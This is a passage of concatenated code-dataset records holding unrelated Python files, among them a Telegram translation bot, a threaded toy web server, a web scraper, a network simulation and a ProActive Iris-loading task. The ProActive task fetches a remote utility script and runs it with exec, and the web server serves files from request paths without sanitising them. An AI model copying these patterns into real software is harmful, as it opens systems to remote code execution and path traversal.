All rights reserved.\n#\n# https://www.acmicpc.net/problem/1157\n#\n\"\"\"\n 'A' = 65\n 'a' = 97\n\n .count('x')\n 리스트 타입에서 사용하는 메서드\n 리스트 안에서 'x'가 몇개있는지 개수를 int 타입으로 리턴해주는 메서드\n 사용하면 코드를 간결하게 할 수 있음.\n\"\"\"\n\ncharacters = list(input())\n\nalphabet = []\nfor i in range(26):\n alphabet.append( characters.count(chr(65+i)) + characters.count(chr(97+i)) )\n\nif alphabet.count(max(alphabet)) == 1:\n print(max(alphabet))\nelse:\n print('?')\n\n","sub_path":"일반/1157_단어공부.py","file_name":"1157_단어공부.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"328827207","text":"__author__ = 'sei'\n\nimport cv2\nimport numpy as np\nfrom scipy import linalg\nfrom matplotlib import pyplot as plt\n\nimg_rgb = cv2.imread('1.jpg',1)\n#img_rgb = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2RGB)\n#img2 = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\ntemplate = cv2.imread('1_template.jpg',1)\n#template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\nw, h, d = template.shape\nW, H, D = img_rgb.shape\n\n# All the 6 methods for comparison in a list\n#methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\n# 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n\nmethods = ['cv2.TM_CCOEFF_NORMED']\n\ndef __residual(params, img, x, y):\n a, b, c = params\n return a*x+b*y+c-img[x,y,0]\n\nfor meth in methods:\n method = eval(meth)\n img = img_rgb.copy()\n #img = cv2.pyrMeanShiftFiltering(img, 10, 10)\n img = cv2.GaussianBlur(img,(9,9),0)\n #img = cv2.bilateralFilter(img,5,105,105)\n\n img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR_FULL)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)\n channels = cv2.split(img)\n channels[0] = cv2.equalizeHist(channels[0])\n img = cv2.merge(channels)\n img = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)\n\n\n res = cv2.matchTemplate(img, template, method)\n\n thresh = res.copy()\n thresh = cv2.convertScaleAbs(thresh)\n thresh = cv2.equalizeHist(thresh)\n thresh = cv2.GaussianBlur(thresh,(3,3),0)\n ret, thresh = cv2.threshold(thresh,100, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n res = (255-res)\n\n threshold = 0.8\n loc = np.where( res >= threshold)\n for pt in zip(*loc[::-1]):\n cv2.circle(img, (pt[0]+w/2, pt[1]+h/2), 4, 255, 1)\n\n cv2.namedWindow('image', cv2.WINDOW_NORMAL)\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"491313024","text":"import matplotlib.pyplot as plt\nfrom tensorboard.backend.event_processing import event_accumulator\nimport glob\nimport re\nimport numpy as np\nimport os\n\nimport pandas as pd\n\ndef scrape_file(file: str, pattern: str, one_per_line: bool = True,\n data_type=float):\n data = []\n with open(file, \"r\") as ff:\n lines = ff.readlines()\n for line in lines:\n matches = re.findall(pattern, line)\n if len(matches) <= 0:\n continue\n\n if one_per_line:\n matches = [matches[0]]\n data += [data_type(m) for m in matches]\n return data\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description='Plot pattern from regex.')\n parser.add_argument('files', metavar='N', type=str, nargs='+',\n help='list of files to scrape')\n\n args = parser.parse_args()\n data_files = []\n\n for f, name in zip(args.files[1::2], args.files[0::2]):\n data_files.append((f, name))\n 
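# positional args alternate: display name, then file path\n 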
assert os.path.isfile(f), f\"{f} is not a file.\"\n\n pattern = '\\(\\'rel_pos\\', ([^)]*)'\n\n rolling_len = 15\n\n fig, ax = plt.subplots()\n\n for i, (f, name) in enumerate(data_files):\n d = scrape_file(f, pattern)\n\n steps = np.arange(len(d))\n value = pd.Series(np.array(d) / 10)\n\n win = value.rolling(rolling_len)\n mu = win.mean()\n sigma = win.std()\n\n base_line, = ax.plot(steps, mu, label=f\"{name}\")\n # ax.fill_between(steps, mu + sigma, mu - sigma,\n # facecolor=base_line.get_color(), alpha=0.5)\n\n ax.legend(loc=\"upper right\")\n plt.title('1 step relative pose (rolling window 15)')\n plt.show()\n\n\n\n\n\n","sub_path":"plot_from_text.py","file_name":"plot_from_text.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"503403640","text":"import json\nimport requests\nimport config\nimport time\n\n\nBOT_URL = 'https://api.telegram.org/bot{}/'.format(config.BOT_TOKEN)\nLANG_URL = 'https://translate.yandex.net/api/v1.5/tr.json/detect'\nTRANSLATE_URL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\n\ndef get_source_language(text):\n params = dict(\n key=config.TRANSLATE_TOKEN,\n text=text,\n hint='en,ru'\n )\n resp = requests.get(url=LANG_URL, params=params)\n data = json.loads(resp.text)\n return data['lang']\n\n\ndef get_translation(text):\n src = get_source_language(text)\n direct = 'en-ru'\n\n if src != 'en':\n direct = 'ru-en'\n\n params = dict(\n key=config.TRANSLATE_TOKEN,\n text=text,\n lang=direct\n )\n resp = requests.get(url=TRANSLATE_URL, params=params)\n data = json.loads(resp.text)\n return data['text'][0]\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode('utf8')\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = BOT_URL + 'getUpdates?timeout=100'\n if offset:\n url += '&offset={}'.format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates['result'])\n last_update = num_updates - 1\n text = updates['result'][last_update]['message']['text']\n chat_id = updates['result'][last_update]['message']['chat']['id']\n return text, chat_id\n\n\ndef send_message(text, chat_id):\n url = BOT_URL + \"sendMessage?text={}&chat_id={}\".format(get_translation(text), chat_id)\n get_url(url)\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates['result']:\n update_ids.append(int(update['update_id']))\n return max(update_ids)\n\n\ndef resp_all(updates):\n for update in updates['result']:\n try:\n text = update['message']['text']\n chat = update['message']['chat']['id']\n send_message(text, chat)\n except Exception as e:\n print(e)\n\n\ndef main():\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates['result']) > 0:\n last_update_id = get_last_update_id(updates) + 1\n resp_all(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"translate_script.py","file_name":"translate_script.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131440953","text":"from cross_over import *\r\n\r\n####################################\r\n# modify variables here\r\ncrossover_num = 100\r\nfirstgen_num = 100\r\np = 0.2\r\n####################################\r\n\r\nfor i in range(crossover_num):\r\n 
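# draw two distinct first-generation assignments to serve as parents\r\n 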
num_list = range(1, firstgen_num+1)\r\n    file_choice = random.sample(num_list, 2)\r\n    file1 = \"data/\"+folder+\"/class_randassign\"+str(file_choice[0])+\".csv\"\r\n    file2 = \"data/\"+folder+\"/class_randassign\"+str(file_choice[1])+\".csv\"\r\n    class_df1 = pd.read_csv(file1)\r\n    class_df2 = pd.read_csv(file2)\r\n\r\n    main(p, classroom_df, class_df1, class_df2)\r\n    class_df1.to_csv(\"data/\"+folder+\"/crossover\"+str(i+1)+\".csv\", index=False)\r\n","sub_path":"second_gen.py","file_name":"second_gen.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"131268431","text":"# 39. Write a program to calculate the area of n number of circle where\n# radius of circle is input by user.\n\npi = 3.14\ni = int(input(\"Enter how many circles you wish program to calculate.\\n\"))\nj = 1\n\nwhile j <= i:\n    print(\"\\nEnter radius of circle {}\".format(j))\n    r = int(input(\"\"))\n    a = pi * r * r\n    print(\"Area of circle {} is {}\".format(j, a))\n    j += 1\n\n\n\n\n\n\n\n","sub_path":"py_practice/Problem39.py","file_name":"Problem39.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"70917643","text":"# -*- coding:utf-8 -*-\n\nimport re\nfrom socket import *\nfrom threading import Thread\n\ndocumentRoot = './html'\nbind_addr = ('', 7788)\n\n\ndef handle(newsocket, clientaddr):\n    # while True:\n    print('---1---')\n    recv_data = newsocket.recv(4096)\n    print('---2---')\n    print(recv_data)\n    if recv_data:\n        recv_data = recv_data.decode('utf-8').splitlines()\n        result = re.split(r' ', recv_data[0])\n        if result[1] == '/':\n            print('---3---')\n            file_name = documentRoot + '/' + 'index.html'\n            print(file_name)\n        else:\n            print('---4---')\n            filename = re.search(r'^/(.+\\b)', result[1])\n            file_name = documentRoot + '/' + filename.group(1)\n            print(file_name)\n        try:\n            f = open(file_name, 'r')\n        except Exception as result:\n            print(result)\n            responseheaderlines = \"HTTP/1.1 404 not found\\r\\n\"\n            responseheaderlines += \"\\r\\n\"\n            responsebody = \"====sorry ,file not found====\"\n            print('---5---')\n        else:\n            responseheaderlines = \"HTTP/1.1 200 OK\\r\\n\"\n            responseheaderlines += \"\\r\\n\"\n            responsebody = f.read()\n            f.close()\n        finally:\n            print('---6---')\n            responsebody = responseheaderlines + responsebody\n            newsocket.send(responsebody.encode('utf-8'))\n            print('---7---')\n            newsocket.close()\n            # break\n\n\ndef main():\n    s = socket(AF_INET, SOCK_STREAM)\n    s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n    s.bind(bind_addr)\n    s.listen(10)\n    try:\n        while True:\n            newsocket, clientaddr = s.accept()\n            t1 = Thread(target=handle, args=(newsocket, clientaddr))\n            t1.start()\n    finally:\n        s.close()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"HTTP服务器/003-web服务器-3-多线程.py","file_name":"003-web服务器-3-多线程.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"19002575","text":"\nimport xlrd\nfrom openpyxl import load_workbook\nimport sys\nimport os\n#from datetime import datetime\nimport io\n#import numpy as np\nfrom PyQt5.QtWidgets import (QApplication,QFileDialog, QTextEdit, QComboBox, QVBoxLayout,QWidget, QPlainTextEdit,QPushButton, QDesktopWidget,QGridLayout, QLabel, QLineEdit,QRadioButton)\nfrom PyQt5.QtGui import QIcon,QColor\nfrom PyQt5.QtCore import QCoreApplication\nimport Validation\n\n#excelPath = 'D:/minwoo/Working_Directory/03_이대엽_크로마틴 구조기반 간암 유방암 예후예측 3D-nucleome 바이오마커 발굴_20190710.xlsx'\n\n\n\nexcelPath = \"\"\n'''\ninput value = excel File\n'''\nclass KonaValidation(QWidget):\n\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n    def center(self): # helper that centers the window on the screen\n        qr = self.frameGeometry()\n        cp = QDesktopWidget().availableGeometry().center()\n        qr.moveCenter(cp)\n        self.move(qr.topLeft())\n\n    def searchExcelFileButtonClicked(self,path,errbox):\n        fname = QFileDialog.getOpenFileName(self)\n        path.setText(fname[0])\n        errbox.clear()\n\n\n    def initUI(self):\n\n        self.resize(1000,600)\n        self.center()\n        self.setWindowTitle(\"Kona Validation Program\")\n        excelPathInput = QLineEdit(self)\n        excelFileSearch = QPushButton(\"엑셀 파일 찾기\",self)\n        validation = QPushButton('Validation Start',self)\n        errorBox = QTextEdit(self)\n\n        grid = QGridLayout()\n        self.setLayout(grid)\n        grid.addWidget(QLabel('엑셀 파일:'),1,0)\n        grid.addWidget(excelPathInput,1,1)\n        grid.addWidget(excelFileSearch,1,2)\n        grid.addWidget(validation,2,1)\n        grid.addWidget(errorBox,3,1)\n        excelFileSearch.clicked.connect(lambda: self.searchExcelFileButtonClicked(excelPathInput,errorBox))\n        validation.clicked.connect(lambda: self.run(str(excelPathInput.text()),errorBox))\n        self.show()\n\n\n\n\n    #bioSample_SampleName = []\n    #experiment_SampleName = []\n\n    def run(self,excelPathInputValue,errbox):\n        try:\n\n            targetExcel = load_workbook(excelPathInputValue,data_only=True) # open the Excel workbook\n\n            bioProjectSheetName = ''\n            bioSampleSheetName = []\n            sampleTypeSheetName = []\n            experimentSheetName = []\n\n            sheets = targetExcel.sheetnames\n            # read the sheet names and bucket each one into a list by keyword\n            for sheet in sheets:\n                if 'BioProject' in str(sheet):\n                    bioProjectSheetName += str(sheet)\n                elif 'BioSample' in str(sheet):\n                    bioSampleSheetName.append(str(sheet))\n                elif 'Sample type' in str(sheet):\n                    sampleTypeSheetName.append(str(sheet))\n                elif 'Experiment' in str(sheet):\n                    experimentSheetName.append(str(sheet))\n\n\n            # repeat once per (BioSample, Sample type, Experiment) triple\n            rotation = len(bioSampleSheetName)\n\n            bioProject = targetExcel[bioProjectSheetName]\n            Validation.bioProject_Validation(bioProject,bioProjectSheetName,errbox) # only one BioProject sheet exists, so validate it directly\n\n            # the remaining sheets are validated as many times as they exist\n            #bioSample_SampleName = []\n\n            i = 0\n            while i < rotation:\n                bioSample = targetExcel[bioSampleSheetName[i]]\n                sampleType = targetExcel[sampleTypeSheetName[i]]\n                experiment = targetExcel[experimentSheetName[i]]\n\n                Validation.bioSample_Validation(bioSample,sampleType,bioSampleSheetName[i],errbox)\n                bioSample_SampleName = Validation.sampleType_Validation(sampleType,sampleTypeSheetName[i],errbox)\n                Validation.Experiment_Validation(experiment,experimentSheetName[i],errbox, bioSample_SampleName)\n                i += 1\n\n        except IOError as err:\n            errbox.insertPlainText(\"IO Error : \" + str(err))\n\n\n\n\nif __name__ == '__main__':\n\n    app = QApplication(sys.argv) # create the application object\n    ex = KonaValidation()\n    #ex.show()\n    sys.exit(app.exec_())\n","sub_path":"KONA_Validation/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"380897452","text":"'''\nCreated on 9 May 2016\n\n@author: quangv\n'''\nfrom src.utility.placement import PlacementGenerator\nfrom src.utility.radii import RadiiGenerator\nimport json, math\nimport random\nfrom math import hypot\nfrom src import constants\n\nclass AdaptiveContextGenerator(object):\n\n    def __init__(self, parameters):\n\n        self.parameters = parameters\n        self.radii_generators = []\n        self.placement_generators = []\n        self.total_population_num = 0\n\n    def _generateContext(self,current_pedestrian_position,group_num, start_area):\n\n        self.total_population_num = 0\n        for num in group_num:\n            self.total_population_num += num\n\n        radii = self.parameters['radius_mean'] * 2 + 0.05\n        grid_cell_size = radii # radius_mean is doubled because each grid cell must hold a full diameter\n        #grid = self._generate_placement_area(self.parameters['start_areas'], grid_cell_size)\n        grid = self._generate_placement_area(start_area, grid_cell_size)\n\n        cells = []\n        while len(cells) != self.total_population_num:\n            cells = random.sample(grid, self.total_population_num)\n\n        #check overlap with already placed pedestrians\n        index_overlapped = []\n        for index_cell in range(len(cells)):\n            current_cell = cells[index_cell]\n            for pedestrian_position in current_pedestrian_position:\n                if hypot(current_cell[0] - pedestrian_position[0], current_cell[1] - pedestrian_position[1]) < radii*2:\n                    index_overlapped.append(index_cell)\n\n        #remove the overlapped cells by their indices\n        index_overlapped = list(set(index_overlapped))\n        cells = [cell for index_cell, cell in enumerate(cells) if index_cell not in index_overlapped]\n\n        for group in group_num:\n            num = group\n\n            radii_generator = RadiiGenerator(self.parameters,num)\n            radii_generator._generate_radii()\n            group_cell = random.sample(cells, num)\n            cells = constants.remove_subset(cells,group_cell)\n\n            position_generator = PlacementGenerator(self.parameters,num)\n            position_generator._generate_placements(group_cell,grid_cell_size,radii_generator._get_radii_for_group())\n\n            self.radii_generators.append(dict(\n                radii_group = radii_generator._get_radii_for_group(),\n                max_radii = radii_generator._get_max_radii()))\n\n            self.placement_generators.append(dict(\n                position_group = position_generator._get_placements_for_group()))\n\n    def _generate_placement_area(self, start_areas,cell_size):\n        grid = list()\n        (x1,y1,x2,y2) = start_areas\n        t = self.parameters['targets'][0]\n        x_range = x2-x1\n        y_range = y2-y1\n        x_offset = (x_range % cell_size)/2\n        y_offset = (y_range % cell_size)/2\n        cells_x = int(math.floor(x_range / cell_size))\n        cells_y = int(math.floor(y_range / cell_size))\n\n        for i in range(cells_x):\n            for j in range(cells_y):\n                grid.append((i * cell_size + x_offset + x1,\n                             j * cell_size + y_offset + y1,t))\n        return grid\n\n\n    def _get_radii_generators(self):\n        return self.radii_generators\n\n    def _get_placement_generators(self):\n        return self.placement_generators\n\n    def _set_radii_generators(self,radii_generators):\n        self.radii_generators = radii_generators\n\n    def _set_placement_generators(self, placement_generators):\n        self.placement_generators = placement_generators\n\nclass AdaptiveContextLog_Encoder(json.JSONEncoder):\n    def default(self, obj):\n        if not isinstance(obj, AdaptiveContextGenerator):\n            return super(AdaptiveContextLog_Encoder, self).default(obj)\n        return obj.__dict__\n\nclass AdaptiveContextLog_Decoder(json.JSONDecoder):\n    def decode(self,json_string):\n\n        default_obj = super(AdaptiveContextLog_Decoder,self).decode(json_string)\n\n        parameters = default_obj['parameters']\n\n        radii_generators = []\n        placement_generators = []\n\n        str_radii_generators = default_obj['radii_generators']\n        for radius in str_radii_generators:\n            radii_generators.append(dict(radii_group = radius['radii_group'],\n                                         max_radii = radius['max_radii']))\n\n        str_placement_generators = default_obj['placement_generators']\n        for placement_generator in str_placement_generators:\n            placement_generators.append(dict(position_group = 
placement_generator['position_group']))\n\n \n context_generator = AdaptiveContextGenerator(parameters)\n context_generator._set_radii_generators(radii_generators)\n context_generator._set_placement_generators(placement_generators)\n \n return context_generator ","sub_path":"3_Crowd Simulations/T_intersection_corridor/cm-simulation-grouping/src/utility/adaptive_context.py","file_name":"adaptive_context.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"620303119","text":"import telebot\nimport config\nimport pars_val\n\nbot = telebot.TeleBot(config.token)\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n markup = telebot.types.InlineKeyboardMarkup()\n markup.add(telebot.types.InlineKeyboardButton(text='Доллар США', callback_data=1))\n markup.add(telebot.types.InlineKeyboardButton(text='Евро', callback_data=2))\n markup.add(telebot.types.InlineKeyboardButton(text='Фунт Стерлингов', callback_data=3))\n markup.add(telebot.types.InlineKeyboardButton(text='Китайский Юань', callback_data=4))\n markup.add(telebot.types.InlineKeyboardButton(text='Швейцарский Франк', callback_data=5))\n markup.add(telebot.types.InlineKeyboardButton(text='Турецкая Лира', callback_data=6))\n markup.add(telebot.types.InlineKeyboardButton(text='Японская Йена', callback_data=7))\n bot.send_message(message.chat.id, text=\"Выберите валюту, по которой хотите узнать курс\", reply_markup=markup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef query_handler(call):\n\n bot.answer_callback_query(callback_query_id=call.id, text='Спасибо за выбор бота')\n answer = ''\n if call.data == '1':\n answer = 'Доллар США ' + pars_val.dollar + ' за одну условную единицу в рублях'\n elif call.data == '2':\n answer = 'Евро ' + pars_val.euro + ' за одну условную единицу в рублях'\n elif call.data == '3':\n answer = 'Фунт Стерлингов ' + pars_val.funt + ' за одну условную единицу в рублях'\n elif call.data == '4':\n answer = 'Китайский Юань ' + pars_val.kit + ' за одну условную единицу в рублях'\n elif call.data == '5':\n answer = 'Швейцарский франк ' + pars_val.frank + ' за одну условную единицу в рублях'\n elif call.data == '6':\n answer = 'Турецкая лира ' + pars_val.lira + ' за одну условную единицу в рублях'\n elif call.data == '7':\n answer = 'Японская йена ' + pars_val.yena + ' за одну условную единицу в рублях'\n\n bot.send_message(call.message.chat.id, answer)\n bot.edit_message_reply_markup(call.message.chat.id, call.message.message_id)\n\nbot.infinity_polling()\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"319503736","text":"import random\nimport time\n\nimport gevent\nimport requests\nfrom lxml import etree\n\n\"\"\"爬取图片\"\"\"\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15'\n}\n\n\ndef get_img():\n url = 'http://sc.chinaz.com/tupian/meinvtupian.html'\n _url = 'http://sc.chinaz.com/tupian/meinvtupian_%d.html'\n\n for i in range(1, 10):\n if i == 1:\n page_text = requests.get(url, headers=HEADERS).text\n else:\n page_text = requests.get(_url % i, headers=HEADERS).text\n tree = etree.HTML(page_text)\n\n data_list = tree.xpath('//div[@id=\"container\"]/div')\n for data in data_list:\n src = data.xpath('./div/a/img/@src2')[0]\n title = 
data.xpath('./div/a/img/@alt')[0].encode('iso-8859-1').decode('utf8')\n img = requests.get(src, headers=HEADERS).content\n with open(f'./imgs/{title}.jpg', 'wb') as f:\n f.write(img)\n\n\ndef get_cv(page):\n if page == 1:\n url = 'http://sc.chinaz.com/jianli/free.html'\n else:\n url = f'http://sc.chinaz.com/jianli/free_{page}.html'\n page_text = requests.get(url, headers=HEADERS).text\n tree = etree.HTML(page_text)\n div_list = tree.xpath('//div[@id=\"container\"]/div')\n for div in div_list:\n href = div.xpath('./a/@href')[0]\n title = div.xpath('./a/img/@alt')[0].encode('iso-8859-1').decode('utf8')\n\n ppt_text = requests.get(href, headers=HEADERS).text\n tree = etree.HTML(ppt_text)\n li_list = tree.xpath('//div[@id=\"down\"]/div[2]/ul/li/a/@href')\n rank = random.randint(0, len(li_list) - 1)\n ppt_url = li_list[rank]\n print(ppt_url, rank, page)\n ppt = requests.get(ppt_url, headers=HEADERS).content\n gevent.spawn(write, title, ppt)\n\n\ndef write(title, ppt):\n with open(f'./cvs/{title}{time.time()}.rar', 'wb') as f:\n f.write(ppt)\n\n\nif __name__ == '__main__':\n start = time.time()\n g_l = []\n for i in range(1, 500):\n g = gevent.spawn(get_cv, i)\n g_l.append(g)\n gevent.joinall(g_l)\n print(time.time() - start)\n","sub_path":"103 爬虫2/hw.py","file_name":"hw.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"7090750","text":"from SimComponents import PacketGenerator, PacketSink, SwitchPort, PortMonitor, Packet\nimport simpy\nfrom functools import partial\nimport logging\nfrom numpy.random import RandomState\nlogger = logging.getLogger(__name__)\n\nclass Network(object):\n def __init__(self):\n self.nodes = {}\n self.links = {}\n\n def get_reward(self):\n total = 0\n for link in self.links:\n pass\n\n def add_link(self, link):\n self.links[link.id] = link\n\n def add_node(self, node):\n self.nodes[node.id] = node\n\nclass RoutingAlgorithm(object):\n def __init__(self, node, gen):\n self.node = node\n self.gen = gen\n\n def route_packet(self, packet):\n for port in self.node.output_ports:\n if port == packet.dst:\n return port\n return self.gen.choice(list(self.node.output_ports.keys()))\n\nclass Link(object):\n def __init__(self, env, id, cost, src, dst, switch_port):\n self.env = env\n self.id = id\n self.cost = cost\n self.src = src\n self.dst = dst\n self.up = True\n self.switch_port = switch_port\n\n def send(self, packet):\n yield self.env.timeout(self.cost)\n self.dst.put(packet)\n\n def put(self, packet):\n self.env.process(self.send(packet))\n\n def __setstate__(self, state):\n self.up = state\n\n # Function for returning different capacity parameters\n def get_capacity(self, option):\n if option == 0:\n return self.switch_port.qlimit\n if option == 1:\n return self.switch_port.size_packet\n if option == 2:\n return self.switch_port.qlimit - self.switch_port.size_packet\n\n def total_cost(self):\n return self.switch_port.size_packet * (self.cost + self.switch_port.rate)\n\nclass Node(object):\n\n def __init__(self, id, env, gen):\n self.env = env\n self.id = id\n self.packet_generator = None\n self.output_ports = {}\n self.port_monitors = {}\n self.routes = {}\n self.routing_algo = None\n self.env.process(self.run())\n self.packet_sink = PacketSink(env=self.env, rec_arrivals=True, id=\"{}_ps\".format(self.id))\n self.gen = gen\n\n self.incoming_packets = simpy.Store(self.env, capacity=1)\n self.packets_received = 0\n self.packets_sent = 0\n\n def set_routing_algo(self):\n # put 
this router into the controller controller.setNode(self.id)\n        self.routing_algo = RoutingAlgorithm(gen=self.gen, node=self)\n\n    def set_packet_generator(self, lbd, possible_destinations):\n\n        def dstdist(gen, possible_destinations):\n            if possible_destinations is None:\n                return None\n            else:\n                return gen.choice(possible_destinations)\n\n        def next_packet_time(gen, lbd):\n            return gen.exponential(lbd)\n\n        packet_dst = partial(dstdist, self.gen, possible_destinations)\n        next_pkt_time = partial(next_packet_time, self.gen, lbd)\n        self.packet_generator = PacketGenerator(env=self.env, id=\"{}_pg\".format(self.id), adist=next_pkt_time, sdist=100, dstdist=packet_dst)\n\n        ## LOOK AT THIS AGAIN - might want to consider putting it into a switch port\n        self.packet_generator.out = self\n\n    def get_port_id(self, dst_node_id):\n        return \"{}_{}\".format(self.id, dst_node_id)\n\n    def get_link_id(self, dst_node_id):\n        return \"{}_{}\".format(self.id, dst_node_id)\n\n    def add_connection(self, dst_node, rate, qlimit, monitor_rate, propagation_delay, bidirectional=False):\n        port_id = self.get_port_id(dst_node.id)\n        new_port = SwitchPort(self.env, rate=rate, qlimit=qlimit, limit_bytes=False, id=port_id)\n        self.output_ports[port_id] = new_port\n\n        link_id = self.get_link_id(dst_node.id)\n        new_link = Link(self.env, id=link_id, cost=propagation_delay, dst=dst_node, src=self.id, switch_port=new_port)\n        self.routes[link_id] = new_link\n\n        new_port.out = new_link\n\n        def dist(gen, lbd):\n            return gen.exponential(lbd)\n\n        port_monitor_id = new_port.id\n        dist_partial = partial(dist, self.gen, monitor_rate)\n        port_monitor = PortMonitor(self.env, port=new_port, dist=dist_partial)\n        self.port_monitors[port_monitor_id] = port_monitor\n\n        if bidirectional:\n            dst_node.add_connection(self, rate, qlimit, monitor_rate, propagation_delay)\n\n    def route(self, packet):\n        return self.routing_algo.route_packet(packet)\n\n    def get_output_port(self, portid):\n        return self.output_ports[portid]\n\n    def get_queue_port(self, portid):\n        port = self.get_output_port(portid)\n        return len(port.store.items)\n\n    def get_queues(self):\n        queues_dict = {k: self.get_queue_port(k) for k in self.output_ports}\n        return queues_dict\n\n    def put(self, packet):\n        self.packets_received += 1\n        if packet.dst == self.id:\n            self.packet_sink.put(packet)\n        else:\n            self.incoming_packets.put(packet)\n        print(\"Packet \" + str(packet.id) + \" put into node \" + str(self.id))\n\n    def run(self):\n        while True:\n            packet = yield (self.incoming_packets.get())\n            # route_packet returns the id of the chosen output port; the same id keys both dicts\n            outgoing_port = self.route(packet)\n            if self.routes[outgoing_port].up:\n                # Increment counter in packet\n                packet.hops_travelled += 1\n                packet.incrementRouteWeight(self.routes[outgoing_port].cost)\n                packet.decrement_ttl()\n\n                self.output_ports[outgoing_port].put(packet)\n                self.packets_sent += 1\n\ndef run():\n    gen = RandomState(2)\n    env = simpy.Environment()\n    n1 = Node(env=env, id=\"n1\", gen=gen)\n    n2 = Node(env=env, id=\"n2\", gen=gen)\n    n3 = Node(env=env, id=\"n3\", gen=gen)\n    n4 = Node(env=env, id=\"n4\", gen=gen)\n    n5 = Node(env=env, id=\"n5\", gen=gen)\n    n6 = Node(env=env, id=\"n6\", gen=gen)\n    n1.set_routing_algo()\n    n2.set_routing_algo()\n    n3.set_routing_algo()\n    n4.set_routing_algo()\n    n5.set_routing_algo()\n    n6.set_routing_algo()\n\n    n1.add_connection(n2, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n    n1.add_connection(n3, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n    n2.add_connection(n4, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n    n4.add_connection(n6, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n    n3.add_connection(n5, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n    n5.add_connection(n6, rate=500, qlimit=64, monitor_rate=1, propagation_delay=5)\n\n    pkt = Packet(1, size=1, id=1, src=n1.id, dst=n6.id)\n    n1.put(pkt)\n\n    env.run(until=100)\n\nrun()","sub_path":"Network_environment/env/JoaoCode/minhrun1.py","file_name":"minhrun1.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"376342124","text":"# -*- coding: utf-8 -*-\n\"\"\"Proactive Load Iris Dataset for Machine Learning\n\nThis module contains the Python script for the Load Iris Dataset task.\n\"\"\"\nimport urllib.request\nimport pandas as pd\n\nglobal variables, resultMetadata\n\n__file__ = variables.get(\"PA_TASK_NAME\")\nprint(\"BEGIN \" + __file__)\n\n# -------------------------------------------------------------\n# Import an external python script containing a collection of\n# common utility Python functions and classes\nPA_CATALOG_REST_URL = variables.get(\"PA_CATALOG_REST_URL\")\nPA_PYTHON_UTILS_URL = PA_CATALOG_REST_URL + \"/buckets/machine-learning-scripts/resources/Utils/raw\"\nexec(urllib.request.urlopen(PA_PYTHON_UTILS_URL).read(), globals())\nglobal check_task_is_enabled, preview_dataframe_in_task_result\nglobal compress_and_transfer_dataframe_in_variables\nglobal assert_not_none_not_empty\n\n# -------------------------------------------------------------\n# Check if the Python task is enabled or not\ncheck_task_is_enabled()\n\n# -------------------------------------------------------------\n# Get data from the propagated variables\n#\nFILE_URL = 